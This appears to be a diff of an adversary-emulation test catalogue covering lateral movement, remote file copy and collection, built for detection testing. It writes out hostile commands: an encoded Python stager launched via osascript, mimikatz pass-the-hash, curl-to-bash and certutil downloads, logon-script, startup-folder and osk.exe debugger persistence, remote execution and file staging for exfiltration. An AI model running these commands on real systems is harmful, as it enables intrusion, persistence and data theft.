command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
|
|
|
|
|
| python &""
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -25812,17 +25884,16 @@ lateral-movement:
|
|
|
|
|
identifier: T1037
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Logon Scripts
|
|
|
|
|
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
|
|
|
|
|
directory.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
|
|
|
|
|
that can be viewed in the Registry Editor.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
script_path:
|
|
|
|
|
description: Path to .bat file
|
|
|
|
|
type: String
|
|
|
|
|
default: "$env:SystemRoot\\Temp\\art.bat"
|
|
|
|
|
default: "%temp%\\art.bat"
|
|
|
|
|
script_command:
|
|
|
|
|
description: Command To Execute
|
|
|
|
|
type: String
|
|
|
|
@@ -25831,16 +25902,16 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo cmd /c "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
|
|
|
|
|
echo "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
|
|
|
|
|
del #{script_path} >nul 2>nul
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
|
|
|
|
|
del #{script_path} >nul 2>&1
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
|
|
|
|
|
- name: Scheduled Task Startup Script
|
|
|
|
|
description: 'Run an exe on user logon or system startup
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
|
|
|
|
|
the tasks, open the Task Scheduler and look in the Active Tasks pane.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25855,7 +25926,7 @@ lateral-movement:
|
|
|
|
|
- name: Logon Scripts - Mac
|
|
|
|
|
description: 'Mac logon script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -25868,10 +25939,11 @@ lateral-movement:
|
|
|
|
|
Populate the plist with the location of your shell script\n\n\t defaults
|
|
|
|
|
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
|
|
|
|
|
- name: Supicious vbs file run from startup Folder
|
|
|
|
|
description: 'vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: "vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance. Upon execution, \"T1137 Hello, World VBS!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25886,9 +25958,11 @@ lateral-movement:
|
|
|
|
|
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
|
|
|
|
|
- name: Supicious jse file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
jse files can be placed in and ran from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, "T1137 Hello, World JSE!" will be printed to the powershell session twice.
|
|
|
|
|
description: "jse files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance.\nUpon execution, \"T1137 Hello, World JSE!\" will be
|
|
|
|
|
displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
|
|
|
|
|
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
|
|
|
|
|
and the user logs in.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25905,7 +25979,8 @@ lateral-movement:
|
|
|
|
|
- name: Supicious bat file run from startup Folder
|
|
|
|
|
description: |
|
|
|
|
|
bat files can be placed in and executed from the startup folder to maintain persistance.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed.
|
|
|
|
|
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
|
|
|
|
folder and will also run when the computer is restarted and the user logs in.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -25992,11 +26067,11 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: crackmapexec Pass the Hash
|
|
|
|
|
description: 'command execute with crackmapexec
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26096,7 +26171,7 @@ lateral-movement:
|
|
|
|
|
- name: Mimikatz Kerberos Ticket Attack
|
|
|
|
|
description: 'Similar to PTH, but attacking Kerberos
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26112,7 +26187,7 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1076:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -26185,7 +26260,7 @@ lateral-movement:
|
|
|
|
|
- how to hijack RDS and RemoteApp sessions transparently to move through an
|
|
|
|
|
organization
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -26197,12 +26272,12 @@ lateral-movement:
|
|
|
|
|
net start sesshijack
|
|
|
|
|
cleanup_command: 'sc.exe delete sesshijack
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: RDPto-DomainController
|
|
|
|
|
description: 'Attempt an RDP session via "Connect-RDP" to a system. Default
|
|
|
|
|
RDPs to (%logonserver%) as the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26225,7 +26300,7 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Connect-RDP -ComputerName #{logonserver} -User #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1105:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -26277,7 +26352,7 @@ lateral-movement:
|
|
|
|
|
- name: rsync remote file copy (push)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26302,11 +26377,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rsync remote file copy (pull)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26331,11 +26406,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (push)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26360,11 +26435,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (pull)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26389,11 +26464,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (push)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26418,11 +26493,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (pull)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26447,12 +26522,12 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (urlcache)
|
|
|
|
|
description: 'Use certutil -urlcache argument to download a file from the web.
|
|
|
|
|
Note - /urlcache also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26469,12 +26544,12 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (verifyctl)
|
|
|
|
|
description: 'Use certutil -verifyctl argument to download a file from the web.
|
|
|
|
|
Note - /verifyctl also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26519,7 +26594,7 @@ lateral-movement:
|
|
|
|
|
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
|
|
|
|
|
HIGH #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - PowerShell Download
|
|
|
|
|
description: |
|
|
|
|
|
This test uses PowerShell to download a payload.
|
|
|
|
@@ -26540,15 +26615,15 @@ lateral-movement:
|
|
|
|
|
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
|
|
|
|
|
"#{destination_path}")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP Worming Activity
|
|
|
|
|
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
|
|
|
|
|
This emulates the activity.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26664,7 +26739,7 @@ lateral-movement:
|
|
|
|
|
- name: Map admin share
|
|
|
|
|
description: 'Connecting To Remote Shares
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26690,11 +26765,11 @@ lateral-movement:
|
|
|
|
|
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
|
|
|
|
|
/u:#{user_name}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Map Admin Share PowerShell
|
|
|
|
|
description: 'Map Admin share utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26715,12 +26790,12 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Copy and Execute File with PsExec
|
|
|
|
|
description: 'Copies a file to a remote host and executes it using PsExec. Requires
|
|
|
|
|
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26737,7 +26812,7 @@ lateral-movement:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'psexec.exe #{remote_host} -c #{command_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Execute command writing output to local Admin Share
|
|
|
|
|
description: |
|
|
|
|
|
Executes a command, writing the output to a local Admin Share.
|
|
|
|
@@ -26759,7 +26834,7 @@ lateral-movement:
|
|
|
|
|
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
|
|
|
|
|
2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1028:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -26822,8 +26897,10 @@ lateral-movement:
|
|
|
|
|
identifier: T1028
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Enable Windows Remote Management
|
|
|
|
|
description: "Powershell Enable WinRM\n\nUpon successful execution, powershell
|
|
|
|
|
will \"Enable-PSRemoting\" allowing for remote PS access. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell Enable WinRM
|
|
|
|
|
|
|
|
|
|
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -26831,10 +26908,16 @@ lateral-movement:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Enable-PSRemoting -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Lateral Movement
|
|
|
|
|
description: "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon
|
|
|
|
|
successful execution, cmd will spawn calc.exe on a remote computer. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell lateral movement using the mmc20 application com object.
|
|
|
|
|
|
|
|
|
|
Reference:
|
|
|
|
|
|
|
|
|
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
|
|
|
|
|
|
|
|
|
Upon successful execution, cmd will spawn calc.exe on a remote computer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26843,11 +26926,11 @@ lateral-movement:
|
|
|
|
|
type: string
|
|
|
|
|
default: computer1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
name: powershell
|
|
|
|
|
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
$null, $null, "7")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC Process Call Create
|
|
|
|
|
description: |
|
|
|
|
|
Utilize WMIC to start remote process.
|
|
|
|
@@ -26875,7 +26958,7 @@ lateral-movement:
|
|
|
|
|
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
|
|
|
|
|
/t REG_SZ /d \"cmd.exe\" /f"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Psexec
|
|
|
|
|
description: |
|
|
|
|
|
Utilize psexec to start remote process.
|
|
|
|
@@ -26933,7 +27016,7 @@ lateral-movement:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
collection:
|
|
|
|
|
T1123:
|
|
|
|
|
technique:
|
|
|
|
@@ -26985,7 +27068,7 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1119:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -27040,33 +27123,40 @@ collection:
|
|
|
|
|
identifier: T1119
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Automated Collection Command Prompt
|
|
|
|
|
description: 'Automated Collection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: |
|
|
|
|
|
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
|
|
|
|
|
dir c: /b /s .docx | findstr /e .docx
|
|
|
|
|
for /R c: %f in (*.docx) do copy %f c:\temp\
|
|
|
|
|
- name: Automated Collection PowerShell
|
|
|
|
|
description: 'Automated Collection
|
|
|
|
|
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
|
|
|
|
|
cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Automated Collection PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
|
|
|
|
|
-destination c:\temp}
|
|
|
|
|
command: |
|
|
|
|
|
New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
|
|
|
|
|
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
|
|
|
|
|
| Out-Null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Recon information for export with PowerShell
|
|
|
|
|
description: 'collect information for exfiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27081,9 +27171,9 @@ collection:
|
|
|
|
|
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
|
|
|
|
|
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
|
|
|
|
|
- name: Recon information for export with Command Prompt
|
|
|
|
|
description: 'collect information for exfiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27094,7 +27184,7 @@ collection:
|
|
|
|
|
doskey /history > %TEMP%\T1119_2.txt
|
|
|
|
|
wmic process list > %TEMP%\T1119_3.txt
|
|
|
|
|
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
|
|
|
|
|
cleanup_command: |-
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
del %TEMP%\T1119_1.txt >nul 2>&1
|
|
|
|
|
del %TEMP%\T1119_2.txt >nul 2>&1
|
|
|
|
|
del %TEMP%\T1119_3.txt >nul 2>&1
|
|
|
|
@@ -27147,7 +27237,7 @@ collection:
|
|
|
|
|
- name: Utilize Clipboard to store or execute commands from
|
|
|
|
|
description: 'Add data to clipboard to copy off or execute commands from.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27159,12 +27249,12 @@ collection:
|
|
|
|
|
clip < %temp%\T1115.txt
|
|
|
|
|
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell
|
|
|
|
|
description: 'Utilize PowerShell to echo a command to clipboard and execute
|
|
|
|
|
it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27216,24 +27306,31 @@ collection:
|
|
|
|
|
identifier: T1074
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Stage data from Discovery.bat
|
|
|
|
|
description: 'Utilize powershell to download discovery.bat and save to a local
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
|
|
|
|
|
verify that the file is saved in the temp directory.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
output_file:
|
|
|
|
|
description: Location to save downloaded discovery.bat file
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:TEMP\\discovery.bat"
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
|
|
|
|
|
> pi.log
|
|
|
|
|
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
|
|
|
|
|
-OutFile #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Stage data from Discovery.sh
|
|
|
|
|
description: 'Utilize curl to download discovery.sh and execute a basic information
|
|
|
|
|
gathering shell script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27242,25 +27339,32 @@ collection:
|
|
|
|
|
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh
|
|
|
|
|
| bash -s > /tmp/discovery.log
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Zip a Folder with PowerShell for Staging in Temp
|
|
|
|
|
description: 'Use living off the land tools to zip a file and stage it in the
|
|
|
|
|
Windows temporary folder for later exfiltration.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
|
|
|
|
|
was placed in the temp directory.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
input_file:
|
|
|
|
|
description: Location of file or folder to zip
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
|
|
|
|
|
output_file:
|
|
|
|
|
description: Location to save zipped file or folder
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:TEMP\\Folder_to_zip.zip"
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
|
|
|
|
|
-DestinationPath $env:TEMP\Folder_to_zip.zip
|
|
